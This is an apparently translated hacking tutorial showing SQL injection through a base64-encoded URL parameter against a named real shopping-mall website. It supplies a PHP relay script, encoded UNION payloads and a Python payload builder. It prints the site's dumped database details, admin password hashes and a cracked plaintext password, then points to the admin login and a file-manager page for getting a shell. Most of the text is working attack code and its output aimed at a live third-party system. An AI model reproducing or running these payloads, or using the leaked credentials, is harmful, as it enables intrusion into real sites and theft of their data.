Base64-encoded relay injection: look carefully at the parameter, don't just assume it is a string

Suppose there is an injection point: http://www.xxx.com/features_view.php?id=22

But the application base64-encodes the parameter (encodes, not encrypts: base64 is reversible without a key), so the URL you actually see is: http://www.xxx.com/features_view.php?id=MjI=

Injecting with a tool or by hand is awkward when every payload has to be encoded first. Instead, set up a local PHP relay: it takes the plain parameter, base64-encodes it with PHP's built-in base64_encode(), fetches the target page and returns the response, so a tool or browser can inject into the plain parameter as if it were unencoded. The code:

  <?php
  // Local relay: request http://127.0.0.1/relay.php?id=22 (or point sqlmap at it)
  // and inject into the plain id; the script encodes it and forwards the request.
  if (!isset($_GET['id'])) { die('missing id'); }
  $a = base64_encode($_GET['id']);
  // rawurlencode keeps '+', '/' and '=' of the base64 output intact in the query string
  $url = "http://www.xxx.com/features_view.php?id=" . rawurlencode($a);
  echo file_get_contents($url);   // requires allow_url_fopen=On in php.ini
  ?>

A real case: http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTI    The parameter is base64-encoded: MTI is 12 (the site drops the trailing = padding; the canonical encoding is MTI=). sqlmap can also drive this directly with its base64encode tamper script; the steps below are done by hand.

Test whether it is injectable:

  id=12     (plain value, sent as MTI)
  id=12'    (sent as MTIn: error)
  id=12     (without the quote: normal)

The quote reaches the query and breaks it, so the value goes into SQL unescaped. But the decoded value is the number 12, so the query is almost certainly WHERE id=12 with no quotes around it: every payload below is appended to 12 without a quote of its own.

1. Determine the number of columns

  id=12 order by 9

Corresponding base64 URL:

  http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgb3JkZXIgYnkgOQ==     (displays normally)

  id=12 order by 10

Corresponding URL:

  http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgb3JkZXIgYnkgMTA=    (error, so the query has 9 columns)


2. Determine the display positions:

  id=12 and 1=2 union select 1,2,3,4,5,6,7,8,9

  http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsNyw4LDk=

  Displayed positions: 5, 7

3. Retrieve basic information (through display position 7):

  id=12 and 1=2 union select 1,2,3,4,5,6,concat(database(),0x2020,version(),0x2020,user()),8,9

  http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsY29uY2F0KGRhdGFiYXNlKCksMHgyMDIwLHZlcnNpb24oKSwweDIwMjAsdXNlcigpKSw4LDkK

  database:  hdm0570415_db
  user:      hdm0570415@223.4.80.80
  version:   5.1.48-log

4. Dump the tables:

  id=12 and 1=2 union select 1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+table_name),8,9 from information_schema.columns where table_schema=0x68646D303537303431355F6462

(Note: 0x68646D303537303431355F6462 is hdm0570415_db as a MySQL hex literal, so the payload needs no quotes)

  http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsR1JPVVBfQ09OQ0FUKERJU1RJTkNUK3RhYmxlX25hbWUpLDgsOSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0weDY4NjQ2RDMwMzUzNzMwMzQzMTM1NUY2NDYy

Tables:

  act,act_cat,act_cat_en,activity,activity_copy,activity_en,activity_en_copy,admin,admin_en,brand,brand_20130320,brand_en,category,category_en,download,download_en,footer,footer_en,img_index,img_index_en,lb_cat,lb_cat_en,news,news_en,rotate,rotate_en,service,user,user_en,video,video_en,videosed,videosed_en,zl_downl,zl_downl_en,zt_downl,zt_downl_en

5. Dump the columns:

  id=12 and 1=2 union select 1,2,3,4,5,6,GROUP_CONCAT(DISTINCT column_name),8,9 from information_schema.columns where table_name=0x61646D696E

(Note: 0x61646D696E is admin as a hex literal)

  http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsR1JPVVBfQ09OQ0FUKERJU1RJTkNUIGNvbHVtbl9uYW1lKSw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjE2NDZENjk2RQo=

  Columns: admin_id,username,passwd,super_admin,lastLogin,session

6. Dump the contents:

  id=12 and 1=2 union select 1,2,3,4,5,6,GROUP_CONCAT(username,0x2020,passwd,0x2020,super_admin),8,9 from admin

  http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsR1JPVVBfQ09OQ0FUKHVzZXJuYW1lLDB4MjAyMCxwYXNzd2QsMHgyMDIwLHN1cGVyX2FkbWluKSw4LDkgZnJvbSBhZG1pbg==

(Only the value after id= is base64-encoded; the id= key itself stays in clear. Encoding "id=12 and ..." as a whole sends a different query.)

Result:

  admin 95f66ac1d48930df6b281ea2fe24fc7d,
  ytadmin 80d799abe463fd94cd165a5982e123b8,      leguan2013
  95f66ac1d48930df6b281ea2fe24fc7d
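As an added example for this write-up (not the author's code), the following Python script does the bookkeeping that the quote test and steps 1 to 6 above do by hand: it decodes the observed parameter (restoring the padding the site drops), checks that the decoded value is a number so no quote is appended to the payloads, builds the ORDER BY and UNION payloads with the hex literals, and base64-encodes them into URLs. The placeholder host http://www.xxx.com/features_view.php from the top of the page, the parameter name id, the 9 columns, display slot 7, schema hdm0570415_db and table admin are taken from the text; the function names are mine. It sends nothing; running it prints each payload next to its encoded URL.

```python
"""Helpers for injecting through a base64-wrapped parameter (added example,
not the write-up's own code).  Builds and checks strings only; sends nothing."""
import base64
from urllib.parse import urlencode

# Placeholder target and parameter name from the top of the write-up.
BASE = "http://www.xxx.com/features_view.php"
PARAM = "id"


def decode_param(value: str) -> str:
    """Decode what the site shows.  Sites often drop the '=' padding (MTI for
    12 instead of MTI=), which b64decode rejects, so restore it first."""
    padded = value + "=" * (-len(value) % 4)
    return base64.b64decode(padded).decode("latin-1")


def b64_param(payload: str) -> str:
    """Encode the raw parameter value as the application expects.  Encode the
    value only: the 'id=' key is not part of it and stays in clear."""
    return base64.b64encode(payload.encode("latin-1")).decode("ascii")


def inject_url(payload: str, base: str = BASE, param: str = PARAM) -> str:
    """Full URL for a raw payload.  ASCII payloads base64 to [A-Za-z0-9=] only;
    '=' is safe inside a query value, so keep it readable and percent-encode
    anything else ('+' and '/' appear once a payload carries non-ASCII bytes)."""
    return base + "?" + urlencode({param: b64_param(payload)}, safe="=")


def is_numeric_context(decoded: str) -> bool:
    """The title's point: a decoded 12 means WHERE id=12 with no quotes, so
    payloads are appended to the number without a quote of their own."""
    return decoded.strip().isdigit()


def quote_probe(decoded: str) -> str:
    """12 -> 12' (MTIn): an error here, while the bare value works, shows the
    value reaches SQL unescaped."""
    return decoded + "'"


def hexlit(s: str) -> str:
    """MySQL hex literal (0x...) for a string, so comparisons need no quotes."""
    return "0x" + s.encode("latin-1").hex().upper()


def union_payload(value: str, ncols: int, slot: int, expr: str, tail: str = "") -> str:
    """'<value> and 1=2 union select 1,...,N<tail>' with expr in the display slot."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = expr
    return f"{value} and 1=2 union select {','.join(cols)}{tail}"


def build_steps(value="12", ncols=9, slot=7, schema="hdm0570415_db", table="admin"):
    """Steps 1 to 6 of the write-up as raw payloads (values taken from the text)."""
    info = "concat(database(),0x2020,version(),0x2020,user())"
    # The '+' is delivered literally (nothing URL-decodes inside base64); the
    # write-up used it as a space and MySQL still accepted the query.
    tables = "GROUP_CONCAT(DISTINCT+table_name)"
    columns = "GROUP_CONCAT(DISTINCT column_name)"
    creds = "GROUP_CONCAT(username,0x2020,passwd,0x2020,super_admin)"
    return {
        "order_ok": f"{value} order by {ncols}",
        "order_fail": f"{value} order by {ncols + 1}",
        "positions": f"{value} and 1=2 union select " + ",".join(map(str, range(1, ncols + 1))),
        "info": union_payload(value, ncols, slot, info),
        "tables": union_payload(value, ncols, slot, tables,
                                f" from information_schema.columns where table_schema={hexlit(schema)}"),
        "columns": union_payload(value, ncols, slot, columns,
                                 f" from information_schema.columns where table_name={hexlit(table)}"),
        "dump": union_payload(value, ncols, slot, creds, f" from {table}"),
    }


if __name__ == "__main__":
    seen = "MTI"                                   # what the URL shows
    value = decode_param(seen)
    print(f"{seen} decodes to {value!r}; numeric context: {is_numeric_context(value)}")
    print("quote probe:", inject_url(quote_probe(value)))
    for name, payload in build_steps(value).items():
        print(f"{name:10} {payload}")
        print(f"{'':10} {inject_url(payload)}")
```

The encoded strings this produces for the ORDER BY, display-position, table and dump steps are character-for-character the ones in the URLs above; the basic-information and column steps differ only because the page's links were encoded with a trailing newline (the Cg==/Qo= endings), which MySQL treats as whitespace.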

7. Find the admin backend:

  http://www.yintai-centre.com/beijing/CN/admin/login.php

Log in:

 

8. Get a shell

   

http://www.yintai-centre.com/beijing/CN/admin/ckfinder/ckfinder.html